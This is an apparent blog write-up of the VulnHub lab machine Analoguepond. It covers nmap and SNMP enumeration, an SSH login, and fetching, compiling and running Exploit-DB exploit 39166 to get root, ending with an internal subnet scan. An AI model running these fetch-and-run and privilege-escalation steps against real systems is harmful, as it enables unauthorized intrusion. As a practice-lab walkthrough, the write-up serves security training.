CTF Analougepond from @knightmare2600 (VulnHub)

It has been a wile since i solved a CTF.  I decided to try to crack the analougepond from @knightmare2600.

First you need to put an appropriate soundtrack for this VM.

Nmap udp :

root@kali:~# nmap -sS -sU -T4 -A -v 192.168.1.14

Starting Nmap 7.60 ( https://nmap.org ) at 2017-08-20 13:37 EDT
NSE: Loaded 146 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating NSE at 13:37
Completed NSE at 13:37, 0.00s elapsed
Initiating ARP Ping Scan at 13:37
Scanning 192.168.1.14 [1 port]
Completed ARP Ping Scan at 13:37, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:37
Completed Parallel DNS resolution of 1 host. at 13:37, 0.01s elapsed
Initiating SYN Stealth Scan at 13:37
Scanning 192.168.1.14 [1000 ports]
Discovered open port 22/tcp on 192.168.1.14
Completed SYN Stealth Scan at 13:37, 1.26s elapsed (1000 total ports)
Initiating UDP Scan at 13:37
Scanning 192.168.1.14 [1000 ports]
Increasing send delay for 192.168.1.14 from 0 to 50 due to 11 out of 19 dropped probes since last increase.
Increasing send delay for 192.168.1.14 from 50 to 100 due to max_successful_tryno increase to 5
Increasing send delay for 192.168.1.14 from 100 to 200 due to max_successful_tryno increase to 6
Warning: 192.168.1.14 giving up on port because retransmission cap hit (6).
UDP Scan Timing: About 15.06% done; ETC: 13:41 (0:02:55 remaining)
Increasing send delay for 192.168.1.14 from 200 to 400 due to 16 out of 39 dropped probes since last increase.
UDP Scan Timing: About 19.39% done; ETC: 13:43 (0:04:14 remaining)
Increasing send delay for 192.168.1.14 from 400 to 800 due to 11 out of 11 dropped probes since last increase.
UDP Scan Timing: About 22.36% done; ETC: 13:44 (0:05:16 remaining)
UDP Scan Timing: About 25.53% done; ETC: 13:45 (0:05:53 remaining)
UDP Scan Timing: About 28.50% done; ETC: 13:46 (0:06:19 remaining)
UDP Scan Timing: About 36.37% done; ETC: 13:48 (0:06:46 remaining)
UDP Scan Timing: About 47.17% done; ETC: 13:49 (0:06:14 remaining)
UDP Scan Timing: About 54.54% done; ETC: 13:50 (0:05:38 remaining)
UDP Scan Timing: About 60.99% done; ETC: 13:50 (0:05:00 remaining)
UDP Scan Timing: About 66.83% done; ETC: 13:51 (0:04:21 remaining)
UDP Scan Timing: About 72.66% done; ETC: 13:51 (0:03:39 remaining)
UDP Scan Timing: About 78.09% done; ETC: 13:51 (0:02:59 remaining)
UDP Scan Timing: About 83.40% done; ETC: 13:51 (0:02:17 remaining)
UDP Scan Timing: About 88.63% done; ETC: 13:51 (0:01:35 remaining)
UDP Scan Timing: About 93.84% done; ETC: 13:51 (0:00:52 remaining)
Discovered open port 161/udp on 192.168.1.14
Completed UDP Scan at 13:52, 904.80s elapsed (1000 total ports)
Initiating Service scan at 13:52
Scanning 93 services on 192.168.1.14
Service scan Timing: About 3.23% done; ETC: 14:29 (0:35:30 remaining)
Service scan Timing: About 35.48% done; ETC: 13:58 (0:03:49 remaining)
Service scan Timing: About 36.56% done; ETC: 14:00 (0:04:34 remaining)
Service scan Timing: About 68.82% done; ETC: 13:57 (0:01:34 remaining)
Service scan Timing: About 76.34% done; ETC: 13:58 (0:01:18 remaining)
Completed Service scan at 13:57, 262.62s elapsed (93 services on 1 host)
Initiating OS detection (try #1) against 192.168.1.14
adjust_timeouts2: packet supposedly had rtt of -175682 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -175682 microseconds. Ignoring time.
NSE: Script scanning 192.168.1.14.
Initiating NSE at 13:57
Completed NSE at 13:57, 30.80s elapsed
Initiating NSE at 13:57
Completed NSE at 13:57, 4.77s elapsed
Nmap scan report for 192.168.1.14
Host is up (0.00045s latency).
Not shown: 1907 closed ports, 91 open|filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b8:83:a1:ee:76:be:b7:3f:b9:45:ad:b4:ba:47:8b:75 (DSA)
| 2048 19:98:89:e1:d4:4c:42:2b:ca:da:37:79:99:1b:c9:ab (RSA)
| 256 81:5d:1c:e1:2b:03:7d:e3:18:c3:bc:a0:cf:0b:f7:63 (ECDSA)
|_ 256 73:0b:c9:69:8a:1d:1b:63:a3:68:ab:f5:c6:a8:c0:1c (EdDSA)
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: f391e6401236975900000000
| snmpEngineBoots: 2
|_ snmpEngineTime: 27m55s
| snmp-sysdescr: Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
|_ System uptime: 27m55.15s (167515 timeticks)
MAC Address: 08:00:27:42:5B:7B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Uptime guess: 0.017 days (since Sun Aug 20 13:33:50 2017)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: analoguepond; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms 192.168.1.14

NSE: Script Post-scanning.
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Initiating NSE at 13:57
Completed NSE at 13:57, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1207.09 seconds
Raw packets sent: 3054 (107.708KB) | Rcvd: 2011 (98.207KB)

 

https://www.offensive-security.com/metasploit-unleashed/snmp-scan/

 

msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(snmp_login) > set rhost 192.168.1.14
[!] RHOST is not a valid option for this module. Did you mean RHOSTS?
rhost => 192.168.1.14
msf auxiliary(snmp_login) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf auxiliary(snmp_login) > set threads 10
threads => 10
msf auxiliary(snmp_login) > run

[+] 192.168.1.14:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

msf auxiliary(snmp_enum) > set rhosts 192.168.1.14
rhosts => 192.168.1.14
msf auxiliary(snmp_enum) > run

[+] 192.168.1.14, Connected.

[*] System information:

Host IP : 192.168.1.14
Hostname : analoguepond
Description : Linux analoguepond 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64
Contact : Eric Burdon <eric@example.com>
Location : There is a house in New Orleans they call it...
Uptime snmp : 01:29:23.40
Uptime system : 01:28:54.15
System date : 2017-8-23 01:20:44.0

 

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

...THE RISING SUN...

In the background of https://www.youtube.com/watch?v=5A-4VGfx5lU

root@kali:~# ssh root@192.168.1.14

Warning: Permanently added '192.168.1.14' (ECDSA) to the list of known hosts.
root@192.168.1.14's password:
Permission denied, please try again.
root@192.168.1.14's password:
Permission denied, please try again.
root@192.168.1.14's password:

root@kali:~# ssh eric@192.168.1.14
eric@192.168.1.14's password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 3.19.0-25-generic x86_64)

* Documentation: https://help.ubuntu.com/

System information as of Tue Aug 22 19:51:44 BST 2017

System load: 1.0 Memory usage: 2% Processes: 83
Usage of /: 82.3% of 5.39GB Swap usage: 0% Users logged in: 0

Graph this data and manage this system at:
https://landscape.canonical.com/
eric@analoguepond:~$ ls
reticulatingsplines.gif
python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
192.168.1.122 - - [23/Aug/2017 01:33:36] "GET /reticulatingsplines.gif HTTP/1.1" 200 -

Cow joke lol

https://www.exploit-db.com/exploits/39166/

eric@analoguepond:~$ wget https://www.exploit-db.com/download/39166
--2017-08-23 01:54:15-- https://www.exploit-db.com/download/39166
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2789 (2.7K) [application/txt]
Saving to: ‘39166’

100%[======================================>] 2,789 --.-K/s in 0s

2017-08-23 01:54:15 (470 MB/s) - ‘39166’ saved [2789/2789]

eric@analoguepond:~$ ls
39166 reticulatingsplines.gif
eric@analoguepond:~$ mv ./39166 ./39166.c
eric@analoguepond:~$ ls
39166.c reticulatingsplines.gif
eric@analoguepond:~$ gcc ./39166.c
eric@analoguepond:~$ ls
39166.c a.out reticulatingsplines.gif
eric@analoguepond:~$ ./a.out
root@analoguepond:~# id
uid=0(root) gid=1000(eric) groups=0(root),4(adm),24(cdrom),30(dip),46(plugdev),111(libvirtd),112(lpadmin),113(sambashare),1000(eric)

 

root@analoguepond:/root# cat /root/flag.txt
C'Mon Man! Y'all didn't think this was the final flag so soon...?

Did the bright lights and big city knock you out...? If you pull
a stunt like this again, I'll send you back to Walker...

This is obviously troll flah #1 So keep going.

root@analoguepond:/root# ifconfig
eth0 Link encap:Ethernet HWaddr 08:00:27:42:5b:7b
inet addr:192.168.1.14 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::a00:27ff:fe42:5b7b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:3213 errors:0 dropped:0 overruns:0 frame:0
TX packets:1469 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:273953 (273.9 KB) TX bytes:185237 (185.2 KB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:748 (748.0 B) TX bytes:748 (748.0 B)

virbr0 Link encap:Ethernet HWaddr 52:54:00:b2:23:25
inet addr:192.168.122.1 Bcast:192.168.122.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:166 errors:0 dropped:0 overruns:0 frame:0
TX packets:149 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:11122 (11.1 KB) TX bytes:17147 (17.1 KB)

root@analoguepond:/root# nmap -sn 192.168.122.0/24

Starting Nmap 6.40 ( http://nmap.org ) at 2017-08-23 02:15 BST
Nmap scan report for puppet.example.com (192.168.122.2)
Host is up (0.00081s latency).
MAC Address: 52:54:00:5B:05:F7 (QEMU Virtual NIC)
Nmap scan report for barringsbank.example.com (192.168.122.3)
Host is up (0.00066s latency).
MAC Address: 52:54:00:6D:93:6A (QEMU Virtual NIC)
Nmap scan report for 192.168.122.1
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.12 seconds

To be continued…

Leave a Reply

Your email address will not be published.